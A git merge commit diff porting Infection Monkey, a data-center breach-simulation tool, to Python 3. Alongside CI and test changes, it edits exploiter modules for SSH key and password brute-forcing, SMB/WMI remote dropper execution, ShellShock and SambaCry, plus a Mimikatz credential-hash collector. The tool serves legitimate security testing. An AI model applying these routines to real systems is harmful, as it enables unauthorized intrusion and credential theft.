Merge branch '393/python-3' into deployment_scripts_python3

# Conflicts:
#	monkey/monkey_island/cc/ui/package-lock.json
#	monkey/monkey_island/cc/ui/package.json
#	monkey/monkey_island/requirements.txt
This commit is contained in:
VakarisZ 2019-11-04 16:06:43 +02:00
commit 88b8d2ce5a
27 changed files with 490 additions and 346 deletions

View File

@ -1,18 +1,29 @@
# Infection Monkey travis.yml. See Travis documentation for information about this file structure.
group: travis_latest
language: python
cache: pip
python:
- 2.7
- 3.7
install:
#- pip install -r requirements.txt
- pip install flake8 # pytest # add another testing frameworks later
- pip install -r monkey/monkey_island/requirements.txt # for unit tests
- pip install flake8 pytest dlint # for next stages
- pip install -r monkey/infection_monkey/requirements_linux.txt # for unit tests
before_script:
# stop the build if there are Python syntax errors or undefined names
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics # Check syntax errors
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics # warn about linter issues. --exit-zero
# means this stage will not fail the build. This is (hopefully) a temporary measure until all warnings are suppressed.
- python monkey/monkey_island/cc/set_server_config.py testing # Set the server config to `testing`, for the UTs to use
# mongomaock and pass.
script:
- true # pytest --capture=sys # add other tests here
- cd monkey # This is our source dir
- python -m pytest # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path.
notifications:
slack: # Notify to slack
rooms:
- infectionmonkey:QaXbsx4g7tHFJW0lhtiBmoAg#ci # room: #ci
on_success: change
on_failure: change # `always` will be the setting once code changes slow down
on_failure: always
email:
on_success: change
on_failure: always

View File

@ -1,13 +1,18 @@
Infection Monkey
====================
[![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey)
[![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases)
![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey)
### Data center Security Testing Tool
## Data center Security Testing Tool
------------------------
Welcome to the Infection Monkey!
The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server.
<img src=".github/map-full.png" >
<img src=".github/Security-overview.png" width="800" height="500">
@ -50,6 +55,12 @@ If you only want to build the monkey from source, see [Setup](https://github.com
and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island).
### Build status
| Branch | Status |
| ------ | :----: |
| Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) |
| Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) |
License
=======
Copyright (c) Guardicore Ltd

View File

@ -1,4 +1,5 @@
import requests
import functools
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
import logging
@ -8,6 +9,7 @@ NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d206
LOGGER = logging.getLogger(__name__)
# noinspection PyArgumentList
class MonkeyIslandRequests(object):
def __init__(self, server_address):
self.addr = "https://{IP}/".format(IP=server_address)
@ -21,29 +23,43 @@ class MonkeyIslandRequests(object):
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
assert False
class _Decorators:
@classmethod
def refresh_jwt_token(cls, request_function):
@functools.wraps(request_function)
def request_function_wrapper(self, *args,**kwargs):
self.token = self.try_get_jwt_from_server()
# noinspection PyArgumentList
return request_function(self, *args, **kwargs)
return request_function_wrapper
def get_jwt_from_server(self):
resp = requests.post(self.addr + "api/auth",
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
verify=False)
return resp.json()["access_token"]
@_Decorators.refresh_jwt_token
def get(self, url, data=None):
return requests.get(self.addr + url,
headers=self.get_jwt_header(),
params=data,
verify=False)
@_Decorators.refresh_jwt_token
def post(self, url, data):
return requests.post(self.addr + url,
data=data,
headers=self.get_jwt_header(),
verify=False)
@_Decorators.refresh_jwt_token
def post_json(self, url, dict_data):
return requests.post(self.addr + url,
json=dict_data,
headers=self.get_jwt_header(),
verify=False)
@_Decorators.refresh_jwt_token
def get_jwt_header(self):
return {"Authorization": "JWT " + self.token}

View File

@ -13,7 +13,7 @@ from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHand
DEFAULT_TIMEOUT_SECONDS = 5*60
MACHINE_BOOTUP_WAIT_SECONDS = 30
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'haddop-2', 'hadoop-3', 'mssql-16',
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8']
LOG_DIR_PATH = "./logs"

View File

@ -11,20 +11,20 @@ class TestSegmentationUtils(IslandTestCase):
# IP not in both
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("3.3.3.3"), text_type("4.4.4.4")], source, target
["3.3.3.3", "4.4.4.4"], source, target
))
# IP not in source, in target
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("2.2.2.2")], source, target
["2.2.2.2"], source, target
))
# IP in source, not in target
self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, target
["8.8.8.8", "1.1.1.1"], source, target
))
# IP in both subnets
self.assertIsNone(get_ip_in_src_and_not_in_dst(
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, source
["8.8.8.8", "1.1.1.1"], source, source
))

View File

@ -395,7 +395,7 @@ class SambaCryExploiter(HostExploiter):
if fileName != '':
smb2Create['Buffer'] = fileName.encode('utf-16le')
else:
smb2Create['Buffer'] = '\x00'
smb2Create['Buffer'] = b'\x00'
if createContexts is not None:
smb2Create['Buffer'] += createContexts

View File

@ -207,7 +207,7 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT)
result = r.content
result = r.content.decode()
return result
except requests.exceptions.RequestException as exc:
LOG.debug("Failed to run, exception %s" % exc)

View File

@ -108,16 +108,15 @@ class SmbExploiter(HostExploiter):
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1)
for str_bind_format, port in list(SmbExploiter.KNOWN_PROTOCOLS.values()):
smb_conn = False
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
rpctransport.set_dport(port)
if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(user, password, '',
lm_hash, ntlm_hash, None)
rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
scmr_rpc = rpctransport.get_dce_rpc()
@ -125,13 +124,14 @@ class SmbExploiter(HostExploiter):
try:
scmr_rpc.connect()
except Exception as exc:
LOG.warning("Error connecting to SCM on exploited machine %r: %s",
self.host, exc)
return False
LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc)
continue
smb_conn = rpctransport.get_smb_connection()
break
if not smb_conn:
return False
# We don't wanna deal with timeouts from now on.
smb_conn.setTimeout(100000)
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)

View File

@ -9,6 +9,7 @@ from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.exploit.tools.helpers import get_interface_to_target
from infection_monkey.model import MONKEY_ARG
from infection_monkey.exploit.tools.exceptions import FailedExploitationError
from infection_monkey.network.tools import check_tcp_port
from common.utils.exploit_enum import ExploitType
from common.utils.attack_utils import ScanStatus
@ -37,15 +38,16 @@ class SSHExploiter(HostExploiter):
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
self._update_timestamp = time.time()
def exploit_with_ssh_keys(self, port, ssh):
def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
exploited = False
for user, ssh_key_pair in user_ssh_key_pairs:
# Creating file-like private key for paramiko
pkey = io.StringIO(ssh_key_pair['private_key'])
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
pkey = paramiko.RSAKey.from_private_key(pkey)
except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
@ -54,52 +56,49 @@ class SSHExploiter(HostExploiter):
ssh.connect(self.host.ip_addr,
username=user,
pkey=pkey,
port=port,
timeout=None)
port=port)
LOG.debug("Successfully logged in %s using %s users private key",
self.host, ssh_string)
exploited = True
self.report_login_attempt(True, user, ssh_key=ssh_string)
break
except Exception as exc:
return ssh
except Exception:
ssh.close()
LOG.debug("Error logging into victim %r with %s"
" private key", self.host,
ssh_string)
self.report_login_attempt(False, user, ssh_key=ssh_string)
continue
return exploited
raise FailedExploitationError
def exploit_with_login_creds(self, port, ssh):
def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
user_password_pairs = self._config.get_exploit_user_password_pairs()
exploited = False
for user, current_password in user_password_pairs:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
ssh.connect(self.host.ip_addr,
username=user,
password=current_password,
port=port,
timeout=None)
port=port)
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
self.host, user, self._config.hash_sensitive_data(current_password))
exploited = True
self.add_vuln_port(port)
self.report_login_attempt(True, user, current_password)
break
return ssh
except Exception as exc:
LOG.debug("Error logging into victim %r with user"
" %s and password (SHA-512) '%s': (%s)", self.host,
user, self._config.hash_sensitive_data(current_password), exc)
self.report_login_attempt(False, user, current_password)
ssh.close()
continue
return exploited
raise FailedExploitationError
def _exploit_host(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
# if ssh banner found on different port, use that port.
@ -112,12 +111,12 @@ class SSHExploiter(HostExploiter):
LOG.info("SSH port is closed on %r, skipping", self.host)
return False
# Check for possible ssh exploits
exploited = self.exploit_with_ssh_keys(port, ssh)
if not exploited:
exploited = self.exploit_with_login_creds(port, ssh)
if not exploited:
try:
ssh = self.exploit_with_ssh_keys(port)
except FailedExploitationError:
try:
ssh = self.exploit_with_login_creds(port)
except FailedExploitationError:
LOG.debug("Exploiter SSHExploiter is giving up...")
return False

View File

@ -2,4 +2,7 @@
class ExploitingVulnerableMachineError(Exception):
""" Raise when exploiter failed, but machine is vulnerable"""
pass
class FailedExploitationError(Exception):
""" Raise when exploiter fails instead of returning False"""

View File

@ -45,7 +45,7 @@ class VSFTPDExploiter(HostExploiter):
s.connect((ip_addr, port))
return True
except socket.error as e:
LOG.error('Failed to connect to %s', self.host.ip_addr)
LOG.info('Failed to connect to %s: %s', self.host.ip_addr, str(e))
return False
def socket_send_recv(self, s, message):
@ -53,7 +53,7 @@ class VSFTPDExploiter(HostExploiter):
s.send(message)
return s.recv(RECV_128).decode('utf-8')
except socket.error as e:
LOG.error('Failed to send payload to %s', self.host.ip_addr)
LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e))
return False
def socket_send(self, s, message):
@ -61,7 +61,7 @@ class VSFTPDExploiter(HostExploiter):
s.send(message)
return True
except socket.error as e:
LOG.error('Failed to send payload to %s', self.host.ip_addr)
LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e))
return False
def _exploit_host(self):

View File

@ -104,9 +104,9 @@ class WmiExploiter(HostExploiter):
ntpath.split(remote_full_path)[0],
None)
if (0 != result.ProcessId) and (0 == result.ReturnValue):
LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
remote_full_path, self.host, result.ProcessId, result.ReturnValue, cmdline)
if (0 != result.ProcessId) and (not result.ReturnValue):
LOG.info("Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
remote_full_path, self.host, result.ProcessId, cmdline)
self.add_vuln_port(port='unknown')
success = True

View File

@ -12,7 +12,7 @@ SMB_SERVICE = 'tcp-445'
LOG = logging.getLogger(__name__)
class Packet(object):
class Packet:
fields = odict([
("data", ""),
])
@ -25,78 +25,79 @@ class Packet(object):
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, list(self.fields.values())))
def to_byte_string(self):
content_list = [(x.to_byte_string() if hasattr(x, "to_byte_string") else x) for x in self.fields.values()]
return b"".join(content_list)
##### SMB Packets #####
class SMBHeader(Packet):
fields = odict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("errorcode", "\x00\x00\x00\x00"),
("flag1", "\x00"),
("flag2", "\x00\x00"),
("pidhigh", "\x00\x00"),
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", "\x00\x00"),
("tid", "\x00\x00"),
("pid", "\x00\x00"),
("uid", "\x00\x00"),
("mid", "\x00\x00"),
("proto", b"\xff\x53\x4d\x42"),
("cmd", b"\x72"),
("errorcode", b"\x00\x00\x00\x00"),
("flag1", b"\x00"),
("flag2", b"\x00\x00"),
("pidhigh", b"\x00\x00"),
("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"),
("reserved", b"\x00\x00"),
("tid", b"\x00\x00"),
("pid", b"\x00\x00"),
("uid", b"\x00\x00"),
("mid", b"\x00\x00"),
])
class SMBNego(Packet):
fields = odict([
("wordcount", "\x00"),
("bcc", "\x62\x00"),
("wordcount", b"\x00"),
("bcc", b"\x62\x00"),
("data", "")
])
def calculate(self):
self.fields["bcc"] = struct.pack("<h", len(str(self.fields["data"])))
self.fields["bcc"] = struct.pack("<h", len(self.fields["data"].to_byte_string()))
class SMBNegoFingerData(Packet):
fields = odict([
("separator1", "\x02"),
("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("separator2", "\x02"),
("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3", "\x02"),
("separator1", b"\x02"),
("dialect1", b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
("separator2", b"\x02"),
("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3", b"\x02"),
("dialect3",
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
("separator4", "\x02"),
("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
("separator5", "\x02"),
("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
("separator6", "\x02"),
("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
("separator4", b"\x02"),
("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
("separator5", b"\x02"),
("dialect5", b"\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
("separator6", b"\x02"),
("dialect6", b"\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
])
class SMBSessionFingerData(Packet):
fields = odict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved", "\x00"),
("andxoffset", "\x00\x00"),
("maxbuff", "\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum", "\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength", "\x4a\x00"),
("reserved2", "\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("wordcount", b"\x0c"),
("AndXCommand", b"\xff"),
("reserved", b"\x00"),
("andxoffset", b"\x00\x00"),
("maxbuff", b"\x04\x11"),
("maxmpx", b"\x32\x00"),
("vcnum", b"\x00\x00"),
("sessionkey", b"\x00\x00\x00\x00"),
("securitybloblength", b"\x4a\x00"),
("reserved2", b"\x00\x00\x00\x00"),
("capabilities", b"\xd4\x00\x00\xa0"),
("bcc1", ""),
("Data",
"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
self.fields["bcc1"] = struct.pack("<i", len(self.fields["Data"]))[:2]
class SMBFinger(HostFinger):
@ -116,30 +117,30 @@ class SMBFinger(HostFinger):
self.init_service(host.services, SMB_SERVICE, SMB_PORT)
h = SMBHeader(cmd="\x72", flag1="\x18", flag2="\x53\xc8")
h = SMBHeader(cmd=b"\x72", flag1=b"\x18", flag2=b"\x53\xc8")
n = SMBNego(data=SMBNegoFingerData())
n.calculate()
packet_ = str(h) + str(n)
buffer = struct.pack(">i", len(packet_)) + packet_.encode()
packet_ = h.to_byte_string() + n.to_byte_string()
buffer = struct.pack(">i", len(packet_)) + packet_
s.send(buffer)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
header = SMBHeader(cmd="\x73", flag1="\x18", flag2="\x17\xc8", uid="\x00\x00")
if data[8:10] == b"\x72\x00":
header = SMBHeader(cmd=b"\x73", flag1=b"\x18", flag2=b"\x17\xc8", uid=b"\x00\x00")
body = SMBSessionFingerData()
body.calculate()
packet_ = str(header) + str(body)
buffer = struct.pack(">i", len(packet_)) + packet_.encode()
packet_ = header.to_byte_string() + body.to_byte_string()
buffer = struct.pack(">i", len(packet_)) + packet_
s.send(buffer)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
if data[8:10] == b"\x73\x16":
length = struct.unpack('<H', data[43:45])[0]
os_version, service_client = tuple(
[e.replace(b'\x00', b'') for e in data[47 + length:].split(b'\x00\x00\x00')[:2]])
[e.replace(b'\x00', b'').decode() for e in data[47 + length:].split(b'\x00\x00\x00')[:2]])
if os_version.lower() != 'unix':
host.os['type'] = 'windows'

View File

@ -27,7 +27,7 @@ class MimikatzCollector(object):
MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
# Password to Mimikatz zip file
MIMIKATZ_ZIP_PASSWORD = r'VTQpsJPXgZuXhX6x3V84G'
MIMIKATZ_ZIP_PASSWORD = b'VTQpsJPXgZuXhX6x3V84G'
def __init__(self):
self._config = infection_monkey.config.WormConfiguration
@ -78,11 +78,11 @@ class MimikatzCollector(object):
for i in range(entry_count):
entry = self._get()
username = entry.username.encode('utf-8').strip()
username = entry.username
password = entry.password.encode('utf-8').strip()
lm_hash = binascii.hexlify(bytearray(entry.lm_hash))
ntlm_hash = binascii.hexlify(bytearray(entry.ntlm_hash))
password = entry.password
lm_hash = binascii.hexlify(bytearray(entry.lm_hash)).decode()
ntlm_hash = binascii.hexlify(bytearray(entry.ntlm_hash)).decode()
if 0 == len(password):
has_password = False

View File

@ -1,11 +1,15 @@
import uuid
import logging
from time import sleep
from .monkey import Monkey
from monkey_island.cc.models.monkey import MonkeyNotFoundError
import pytest
from monkey_island.cc.models.monkey import Monkey, MonkeyNotFoundError
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
from .monkey_ttl import MonkeyTtl
logger = logging.getLogger(__name__)
class TestMonkey(IslandTestCase):
"""
@ -32,7 +36,7 @@ class TestMonkey(IslandTestCase):
# MIA stands for Missing In Action
mia_monkey_ttl = MonkeyTtl.create_ttl_expire_in(30)
mia_monkey_ttl.save()
mia_monkey = Monkey(guid=str(uuid.uuid4()), dead=False, ttl_ref=mia_monkey_ttl)
mia_monkey = Monkey(guid=str(uuid.uuid4()), dead=False, ttl_ref=mia_monkey_ttl.id)
mia_monkey.save()
# Emulate timeout - ttl is manually deleted here, since we're using mongomock and not a real mongo instance.
sleep(1)
@ -70,8 +74,10 @@ class TestMonkey(IslandTestCase):
# Act + assert
# Find the existing one
self.assertIsNotNone(Monkey.get_single_monkey_by_id(a_monkey.id))
# Raise on non-existent monkey
self.assertRaises(MonkeyNotFoundError, Monkey.get_single_monkey_by_id, "abcdefabcdefabcdefabcdef")
with pytest.raises(MonkeyNotFoundError) as e_info:
_ = Monkey.get_single_monkey_by_id("abcdefabcdefabcdefabcdef")
def test_get_os(self):
self.fail_if_not_testing_env()
@ -125,29 +131,41 @@ class TestMonkey(IslandTestCase):
ip_addresses=[ip_example])
linux_monkey.save()
logger.debug(id(Monkey.get_label_by_id))
cache_info_before_query = Monkey.get_label_by_id.storage.backend.cache_info()
self.assertEqual(cache_info_before_query.hits, 0)
self.assertEqual(cache_info_before_query.misses, 0)
# not cached
label = Monkey.get_label_by_id(linux_monkey.id)
cache_info_after_query_1 = Monkey.get_label_by_id.storage.backend.cache_info()
self.assertEqual(cache_info_after_query_1.hits, 0)
self.assertEqual(cache_info_after_query_1.misses, 1)
logger.info("1) ID: {} label: {}".format(linux_monkey.id, label))
self.assertIsNotNone(label)
self.assertIn(hostname_example, label)
self.assertIn(ip_example, label)
# should be cached
_ = Monkey.get_label_by_id(linux_monkey.id)
cache_info_after_query = Monkey.get_label_by_id.storage.backend.cache_info()
self.assertEqual(cache_info_after_query.hits, 1)
label = Monkey.get_label_by_id(linux_monkey.id)
logger.info("2) ID: {} label: {}".format(linux_monkey.id, label))
cache_info_after_query_2 = Monkey.get_label_by_id.storage.backend.cache_info()
self.assertEqual(cache_info_after_query_2.hits, 1)
self.assertEqual(cache_info_after_query_2.misses, 1)
# set hostname deletes the id from the cache.
linux_monkey.set_hostname("Another hostname")
# should be a miss
label = Monkey.get_label_by_id(linux_monkey.id)
cache_info_after_second_query = Monkey.get_label_by_id.storage.backend.cache_info()
logger.info("3) ID: {} label: {}".format(linux_monkey.id, label))
cache_info_after_query_3 = Monkey.get_label_by_id.storage.backend.cache_info()
logger.debug("Cache info: {}".format(str(cache_info_after_query_3)))
# still 1 hit only
self.assertEqual(cache_info_after_second_query.hits, 1)
self.assertEqual(cache_info_after_second_query.misses, 2)
self.assertEqual(cache_info_after_query_3.hits, 1)
self.assertEqual(cache_info_after_query_3.misses, 2)
def test_is_monkey(self):
self.fail_if_not_testing_env()

View File

@ -15,4 +15,4 @@ class LogTest(flask_restful.Resource):
if not log:
return {'results': None}
log_file = database.gridfs.get(log['file_id'])
return {'results': log_file.read()}
return {'results': log_file.read().decode()}

View File

@ -20,7 +20,7 @@ class LogService:
return \
{
'monkey_label': monkey_label,
'log': log_file.read(),
'log': log_file.read().decode(),
'timestamp': log['timestamp']
}

View File

@ -107,10 +107,10 @@ class AWSExporter(Exporter):
else:
return False
except UnknownServiceError as e:
logger.warning('AWS exporter called but AWS-CLI securityhub service is not installed. Error: ' + e)
logger.warning('AWS exporter called but AWS-CLI security hub service is not installed. Error: {}'.format(e))
return False
except Exception as e:
logger.exception('AWS security hub findings failed to send. Error: ' + e)
logger.exception('AWS security hub findings failed to send. Error: {}'.format(e))
return False
@staticmethod

View File

@ -1,112 +1,9 @@
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
from common.data.zero_trust_consts import *
from monkey_island.cc.models.zero_trust.finding import Finding
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
def save_example_findings():
# arrange
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1
# devices unexecuted = 1
# people verify = 1
# networks verify = 1
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
# people verify = 2
# networks verify = 2
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
# data failed 1
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 2
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 3
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 4
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data failed 5
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
# data verify 1
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
# data verify 2
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
# data passed 1
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, [])
class TestZeroTrustService(IslandTestCase):
def test_get_pillars_grades(self):
self.fail_if_not_testing_env()
self.clean_finding_db()
save_example_findings()
expected = [
{
STATUS_FAILED: 5,
STATUS_VERIFY: 2,
STATUS_PASSED: 1,
STATUS_UNEXECUTED: 1,
"pillar": "Data"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 2,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 1,
"pillar": "People"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 2,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 4,
"pillar": "Networks"
},
{
STATUS_FAILED: 1,
STATUS_VERIFY: 0,
STATUS_PASSED: 2,
STATUS_UNEXECUTED: 1,
"pillar": "Devices"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 0,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 0,
"pillar": "Workloads"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 0,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 3,
"pillar": "Visibility & Analytics"
},
{
STATUS_FAILED: 0,
STATUS_VERIFY: 0,
STATUS_PASSED: 0,
STATUS_UNEXECUTED: 0,
"pillar": "Automation & Orchestration"
}
]
result = ZeroTrustService.get_pillars_grades()
self.assertEqual(result, expected)
def test_get_principles_status(self):
self.fail_if_not_testing_env()
self.clean_finding_db()
self.maxDiff = None
save_example_findings()
expected = {
EXPECTED_DICT = {
AUTOMATION_ORCHESTRATION: [],
DATA: [
{
@ -249,9 +146,127 @@ class TestZeroTrustService(IslandTestCase):
WORKLOADS: []
}
result = ZeroTrustService.get_principles_status()
def save_example_findings():
# arrange
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2
